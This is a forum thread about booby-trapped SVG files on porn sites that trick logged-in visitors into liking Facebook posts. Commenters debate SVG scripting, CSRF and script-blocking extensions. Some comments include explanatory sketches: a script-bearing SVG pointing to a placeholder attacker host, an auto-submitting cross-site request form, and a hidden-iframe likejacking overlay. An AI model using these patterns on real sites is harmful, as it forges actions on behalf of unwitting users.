> Security firm Malwarebytes on Friday said it recently discovered that porn sites have been seeding boobytrapped .svg files to select visitors. When one of these people clicks on the image, it causes browsers to surreptitiously register a like for Facebook posts promoting the site.
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
mathgeek · 2m ago
> I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
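To make that concrete, a script-bearing SVG looks roughly like this (a toy sketch only; the real payload will look nothing like it, and thumbnail.jpg / attacker.example are placeholders). The script only runs when the SVG is loaded as its own document or inlined, never through a plain <img> tag:

    <svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
      <!-- looks like an ordinary thumbnail to the visitor -->
      <image href="thumbnail.jpg" width="300" height="200"/>
      <script><![CDATA[
        // waiting for a real click gives the attacker a genuine user
        // gesture, which is what popup blockers and bot heuristics key on
        document.documentElement.addEventListener('click', () => {
          window.open('https://attacker.example/landing');  // stand-in for the actual payload
        });
      ]]></script>
    </svg>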
mananaysiempre · 2h ago
> The Scalable Vector Graphics format is an open standard for rendering two-dimensional graphics.
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
mouse_ · 4m ago
I still miss Flash
michaelt · 2h ago
I think some people on the SVG design committee were aiming to replace Flash for things like browser games, and wanted animations and javascript and so on to support that role.
That led to the weird situation where browsers have two ways of embedding an SVG into a web page: embed it in an <img> tag and the javascript won't run, but embed it in an <iframe> and it will (though of course iframe height can't auto-size...)
The javascript also means pretty much no user-generated-content sites allow the upload of SVGs. Wikipedia is the only place I can think of - and even they serve the SVG as a PNG almost everywhere.
kevin_thibedeau · 2h ago
You can also embed in <object>.
kibibu · 2h ago
You can also just throw an SVG element straight into your html
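Putting the four routes from this subthread side by side (picture.svg is a placeholder; the behavior described is the usual browser behavior and worth double-checking):

    <!-- 1. <img>: rendered as a static image; scripts and external loads are disabled -->
    <img src="picture.svg" alt="picture">

    <!-- 2. <iframe>: the SVG becomes its own document, so its scripts run
         (a sandbox attribute without allow-scripts would block them) -->
    <iframe src="picture.svg"></iframe>

    <!-- 3. <object>: also a separate document; scripts run here too -->
    <object type="image/svg+xml" data="picture.svg"></object>

    <!-- 4. inline: part of the host page's DOM, so scripts run in the page's own context -->
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10" width="100" height="100">
      <circle cx="5" cy="5" r="4"/>
    </svg>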
vaylian · 1h ago
xmlns namespaces for the win!
guerrilla · 51m ago
I miss XML. It made so much sense. XSLT was awesome.
All the more reason to block all JS by default with add-ons like NoScript or uBO and manage a whitelist.
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
Santosh83 · 32m ago
This used to be the case many years ago. But these days practically every site pulls in content from several other sites, sometimes dozens. Fine-tuning NoScript to get such a site working without obscure breakage takes a long time of trial & error, reloading again & again. Now consider that you have to do this for every one of your regular sites.
NoScript is just too painful for people who want to just browse the web. It's the Gentoo of browser extensions. People with massive time & patience can do it, yes, but the rest of us are best served by uBlock & standard browser protections.
JohnFen · 4m ago
> But these days practically every site pulls in content from several other sites, sometimes dozens.
And excluding that content almost invariably improves the page.
zahlman · 20m ago
> But these days practically every site pulls in content from several other sites, sometimes dozens.
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
edoceo · 24m ago
> the gentoo of browser extensions
I was already convinced, you don't need to keep selling it ;)
gruez · 1h ago
>It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
zahlman · 14m ago
> Do you just whitelist every site you come across if it's broken?
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
JohnFen · 2m ago
> Or do you bail if it requires javascript?
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
lemoncookiechip · 28m ago
First off, I use uBO + NoScript + ClearURLs (removes tracking parameters from URLs) + FastForward (circumvents sites like adfly) + a pop-up blocker of your choice (stronger blocking than the default, and whitelist-only in my case). They're all popular add-ons on Firefox, and they (or variants of them) should also be available on Chrome. You don't need them all; uBO is more than fine for most use cases. I've just gotten used to this setup over the years.
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, and when they do, they don't require every single JS domain on the page. Many popular news sites, for example, try to load JS from 10 or more different domains but only really require one (or none) to be usable. Take CNN: I don't need to whitelist its main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, I see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc.
Take Hacker News. It's usable without JS: I can read, navigate and comment. But if I want to use the search function, I need to whitelist algolia.com (which powers the search), or else I just see "This page will only work with JavaScript enabled". The search function not working is the most common issue you'll find if you block all JS by default.
gruez · 16m ago
>You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Not all sites require JS to work, and when they do, they don't require every single JS domain on the page. Many popular news sites, for example, try to load JS from 10 or more different domains but only really require one (or none) to be usable. Take CNN: I don't need to whitelist its main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, I see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc.
Don't the default uBlock filter lists, plus maybe an extension for auto-closing cookie banners, get most of those?
ndriscoll · 1h ago
> Or do you bail if it requires javascript?
It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
gruez · 22m ago
>It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
Seems only narrowly applicable. I can see how you can use this logic to discount articles like "how to make a good blog" or whatever, but that's presumably only a tiny minority of the articles you'd read. If the topic is literally anything else, it doesn't really hold. It doesn't seem fair to discount whatever an AI engineer or DBA has to say because they don't share the same fanaticism about lightweight sites as you. On the flip side, I see plenty of AI-generated slop that works fine with javascript disabled, because it's using some sort of SaaS (think Medium) or a static site generator.
JohnFen · 27s ago
> because they don't share the same fanaticism of lightweight sites as you.
For me, it's not about sites being lightweight, it's about sites not being trustworthy enough to allow them to run code on my machine.
rep_lodsb · 11m ago
A bit of fanaticism might be exactly what is needed to push back against the web becoming completely unusable.
bogwog · 28m ago
For me, if the site is broken and I'm interested in the content, I sometimes enable JavaScript temporarily without adding it to my whitelist. Deciding what to do when I encounter a broken site is the easy part.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
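For reference, the element picker just writes ordinary cosmetic filters into uBO's "My filters" pane, one per hidden element; the selectors below are invented purely to show the shape:

    ! hypothetical example rules, as the element picker would generate them
    stackoverflow.com##.dismissable-banner
    stackoverflow.com##div.sidebar-ads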
gruez · 19m ago
>For me, if the site is broken and I'm interested in the content, I sometimes enable JavaScript temporarily without adding it to my whitelist. Deciding what to do when I encounter a broken site is the easy part.
But that basically negates all the security benefits, because all it takes to get a 0-day payload to run is to make the content sufficiently enticing and make javascript "required" for viewing the site. You might save some battery/data usage, but if you value your time at all, I suspect any benefit is going to be eaten up by having to constantly whitelist sites.
rep_lodsb · 16m ago
Personally, if some random link I click doesn't work without scripts at all, chances are that it's not worth the effort and potential security/privacy compromise anyway. But in many cases, the content is readable, with perhaps some layout breakage. Might even get around paywalls by blocking JS.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
mindslight · 1h ago
Investing in NoScript can actually make pages faster, even if you end up enabling a bunch of javascript for functionality. For example, I remember having to whitelist only about half the resources used by homedepot.com. The rest was just shameless surveillance bloat, continually backhauling gobs of data as you were merely viewing the page. The site loaded and ran quicker without it.
bogwog · 26m ago
FYI, uBlock Origin has javascript blocking features just like NoScript, so if you're already using it as your ad blocker, you don't need a separate extension to block javascript too
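For anyone curious, the NoScript-style default-deny setup in uBO lives behind the "I am an advanced user" setting: per-site switches and dynamic rules pasted into the "My rules" pane, roughly like this (example.com and cdn.example.net are placeholders):

    no-scripting: * true
    no-scripting: example.com false
    * * 3p-script block
    * * 3p-frame block
    example.com cdn.example.net * noop

The first line turns JS off everywhere, the second turns it back on for one trusted site, and the last three block third-party scripts and frames globally while letting one CDN through on that site.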
lemoncookiechip · 19m ago
This is absolutely true. But personally I find NoScript's UI more intuitive to use for JS domain blocking (mostly because I've been using it for years now). I also used to use uMatrix by the same author as uBO before it was deprecated on Chromium browsers.
ndriscoll · 2h ago
> Facebook regularly shuts down accounts that engage in these sorts of abuse.
But does not fix the CSRF vulnerability, apparently.
mathiaspoint · 2h ago
Probably because they need it themselves for data collection.
The Ars article links to Malwarebytes, but the Ars article is better. The headline is better; the most interesting part is that they run code from an SVG. Ars also adds context on how the same hole was used before to hijack Microsoft accounts, and also by the Russians. Malwarebytes, meanwhile, is mostly about porn-site clickjacking to like Facebook posts (and complains about age verification), though it does have a bit more technical detail. Read both, I guess?
lostmsu · 1h ago
What's the hole? Neither appear to say.
cheschire · 2h ago
Finally, a reason why porn in incognito mode is actually a safety mechanism.
ta1243 · 2h ago
Running facebook in incognito mode, or at least in a separate container, is also an essential safety mechanism.
WarOnPrivacy · 21m ago
> Running facebook in a separate container is also an essential safety mechanism.
Yes! And that container is in a Firefox instance, accessed as a remote app (I'm here now, but in a different container).
medwards666 · 1h ago
... or just not running Faecesbook at all.
WarOnPrivacy · 16m ago
> ... or just not running Faecesbook at all.
At one time I agreed, and had even deleted my genuine FB acct. But I had to briefly create another one in 2021 to find a rental - where I live now.
I still have my ancient fake FB acct for Marketplace, etc but it's walled off.
QAkICoU7IDNkpFu · 2h ago
“The user will have to be logged in on Facebook for this to work, but we know many people keep Facebook open for easy access.”
Well there's your problem right there.
mananaysiempre · 32m ago
Bog-standard CSRF is what that is. It’s essentially the second thing you guard against, right after sanitizing inputs to prevent XSS and SQL injection.
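A toy sketch of what "bog-standard CSRF" means here (target.example and the endpoint are made up, not Facebook's): the attacker's page fires a cross-site request on its own, and the browser helpfully attaches the victim's session cookie to it, which is exactly what per-request tokens and SameSite cookies are meant to stop:

    <!-- auto-submitting cross-site POST; only works if the target site
         neither checks a CSRF token nor relies on SameSite cookies -->
    <form action="https://target.example/like" method="POST" id="csrf">
      <input type="hidden" name="post_id" value="12345">
    </form>
    <script>document.getElementById('csrf').submit();</script>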
shazbotter · 32m ago
People still have Facebook accounts? I genuinely don't know why anyone does at this point.
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, did you know Meta has been using them to train their AI? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Havoc · 26m ago
A ton of my friends still use Facebook Messenger as the primary way to reach them.
lostmsu · 1h ago
This makes no sense. How does an SVG click the Facebook like button? Is there a vulnerability? The post doesn't say anything like that.
Why are they clicking like buttons instead of stealing money from bank accounts then?
zb3 · 1h ago
Yeah, at first I thought this was about a browser 0-day... but no. So where is the vulnerability? Is Facebook vulnerable?
saagarjha · 2h ago
I'm curious how you can click the like button using JavaScript…
55555 · 1h ago
The user has to click on the image, so I think the SVG is embedding the FB like button onto the page and drawing another element on top of it to hide it.
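If so, that's the classic "likejacking" overlay; a rough sketch of the pattern (social.example and the widget URL are placeholders, not Facebook's real plugin endpoint):

    <div style="position: relative; width: 140px; height: 40px;">
      <!-- the decoy the visitor thinks they're clicking -->
      <button style="width: 100%; height: 100%;">Play video</button>
      <!-- a real, functional Like widget loaded in a frame, made invisible
           and stacked exactly on top of the decoy so it receives the click -->
      <iframe src="https://social.example/plugins/like?target=POST_ID"
              style="position: absolute; inset: 0; opacity: 0; border: 0;"
              scrolling="no"></iframe>
    </div>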
johnisgood · 1h ago
Where is the SVG only?
ajross · 2h ago
SVG really is just an awful format. What the market wanted was a clean, easily parseable specification for vector image data based on a solid rendering specification. What it got was an extensible HTML-like scripting language where all the vector stuff was ad hoc and poorly implemented, and where (this is the bit that absolutely drives me up the wall) the actual image data is not stored in the metadata format they chose. You have to parse this entirely different string format if you want to extract the points on your curve or whatever!
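Concretely: the geometry lives inside the d attribute's own little grammar, so pulling the control points out of even a trivial file means writing a second parser on top of the XML one:

    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 100">
      <!-- moveto / cubic-bezier / smooth-cubic commands packed into one string -->
      <path d="M 10 80 C 40 10, 65 10, 95 80 S 150 150, 180 80"
            fill="none" stroke="black"/>
    </svg>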